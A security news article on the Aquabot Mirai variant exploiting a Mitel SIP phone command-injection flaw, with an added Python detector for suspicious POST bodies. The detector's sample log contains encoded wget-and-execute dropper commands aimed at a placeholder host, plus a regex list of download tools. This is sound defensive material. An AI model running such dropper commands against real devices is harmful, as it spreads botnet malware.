A Mirai-based malware family this month started targeting vulnerable Mitel SIP phones to ensnare them in a botnet capable of launching distributed denial-of-service (DDoS) attacks, Akamai reports.
The malware, called Aquabot, attempts to exploit CVE-2024-41710, a high-severity command injection vulnerability affecting Mitel 6800, 6900, and 6900w series SIP phones, including the 6970 Conference Unit.
In July 2024, Mitel announced firmware updates that patch the flaw, warning that its successful exploitation “could allow an authenticated attacker with administrative privilege to conduct a command injection attack due to insufficient parameter sanitization during the boot process”.
“A successful exploit of this vulnerability could allow an attacker to execute arbitrary commands within the context of the phone, with potential impacts on the confidentiality, integrity, and availability of the device,” Mitel said.
In August, PacketLabs’ Kyle Burns published proof-of-concept (PoC) exploit code targeting CVE-2024-41710, explaining that its root cause is the improper sanitization of user-supplied input and that multiple endpoints in vulnerable firmware releases are affected.
The flaw could allow an attacker to use crafted HTTP POST requests to smuggle in entries that the sanitization checks would otherwise block. By targeting a vulnerable endpoint, the researcher was able to modify the device’s configuration file so that a script prepended to it would be executed during boot.
According to a fresh Akamai report, the first exploitation attempts targeting CVE-2024-41710 were seen in January 2025, roughly six months after the vulnerability was publicly disclosed.
The payload observed in these attacks was identical to Burns’ PoC code, and was used to spread malware to vulnerable Mitel SIP phones.
“This payload will attempt to fetch and execute a shell script called ‘bin.sh’, which will in turn fetch and execute Mirai malware on the target system, with support for a variety of different architectures, like x86 and ARM,” Akamai explains.
The malware is a new variant of the Mirai-based Aquabot, with typical DDoS attack functions and new functionality that reports to the command-and-control (C&C) server when certain signals are caught, likely as a means of monitoring the bot’s health.
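The two technical details above, crafted POST bodies that slip past sanitization checks and a payload that fetches and runs a `bin.sh` dropper, suggest a simple detection: decode each recorded POST body (including layered URL-encoding) and look for a download-and-execute chain. The following is an added example written for this page, not code from Akamai, PacketLabs, or Mitel. The log format, the `/example/config` path, the 198.51.100.10 address (an RFC 5737 test address), and the indicator patterns are all assumptions made for the illustration; the sample log lines are constructed, not captured traffic.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample of an HTTP access log that also records POST bodies.
# Format (an assumption of this example): METHOD <tab> PATH <tab> BODY.
# The path and the 198.51.100.10 address are placeholders, not Aquabot's
# real endpoints or infrastructure.
SAMPLE_LOG = [
    "POST\t/example/config\tusername=admin&hostname=lobby-phone-01",
    "POST\t/example/config\tdescription=see+setup.sh+notes",
    # single-encoded: cd /tmp; wget .../bin.sh -O bin.sh; chmod +x bin.sh; ./bin.sh
    "POST\t/example/config\tcmd=cd+%2Ftmp%3B+wget+http%3A%2F%2F198.51.100.10%2Fbin.sh"
    "+-O+bin.sh%3B+chmod+%2Bx+bin.sh%3B+.%2Fbin.sh",
    # double-encoded: wget .../bin.sh -O-|sh  (one decode round still hides 'wget')
    "POST\t/example/config\tcmd=%2577get%2520http%253A%252F%252F198.51.100.10"
    "%252Fbin.sh%2520-O-%257Csh",
    # same payload over GET: ignored here because the article describes POST abuse
    "GET\t/example/config\tcmd=wget+http%3A%2F%2F198.51.100.10%2Fbin.sh%7Csh",
]

# Generic dropper-chain heuristics (an assumption of this example), not
# signatures published by Akamai or PacketLabs.
INDICATORS = {
    "download_tool": re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I),
    "shell_script": re.compile(r"\b[\w.-]*\.sh\b", re.I),
    "command_chain": re.compile(r"[;|`]|&&|\$\("),
    "execute": re.compile(r"[|;&]\s*(sh|bash)\b|chmod\s+\+?x|\./[\w.-]+", re.I),
}


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """Undo form encoding, then repeated percent-encoding.

    Only the outermost layer treats '+' as a space; inner layers are plain
    percent-decoding so a literal '+x' (as in chmod +x) is not mangled.
    Stops early once a round changes nothing.
    """
    value = unquote_plus(value)
    for _ in range(max_rounds - 1):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_body(body: str) -> dict:
    """Decode one POST body and report which indicators it matches."""
    decoded = decode_layers(body)
    hits = [name for name, pat in INDICATORS.items() if pat.search(decoded)]
    # A lone '.sh' mention is not enough; require a fetch plus chaining/execution.
    suspicious = "download_tool" in hits and (
        "command_chain" in hits or "execute" in hits
    )
    return {"decoded": decoded, "indicators": hits, "suspicious": suspicious}


def scan_log(lines):
    """Return (line number, path, indicators) for suspicious POST bodies."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        method, path, body = line.split("\t", 2)
        if method != "POST":
            continue
        result = analyze_body(body)
        if result["suspicious"]:
            findings.append((lineno, path, result["indicators"]))
    return findings


if __name__ == "__main__":
    for lineno, path, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {path} -> {', '.join(hits)}")
```

Running it flags only the two injected bodies (lines 3 and 4); the benign request that merely mentions `setup.sh` is not reported, and the double-encoded payload is caught only because decoding is repeated until it stabilizes. On a real deployment the body field would come from a reverse proxy or the phone's management interface logs, and the indicator list should be tuned to the configuration fields the endpoint legitimately accepts.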
In addition to the Mitel flaw, Aquabot was also seen targeting vulnerabilities in Hadoop YARN, the Roxy-WI web interface, and in Linksys, Teltonika, Dasan GPON, and LB-LINK routers.
News of CVE-2024-41710’s exploitation came roughly three weeks after the US cybersecurity agency CISA warned that two security defects in the Mitel MiCollab enterprise collaboration platform, tracked as CVE-2024-41713 and CVE-2024-55550, have been exploited in the wild.
Related: Murdoc Botnet Ensnaring Avtech, Huawei Devices
Related: Record-Breaking DDoS Attack Reached 5.6 Tbps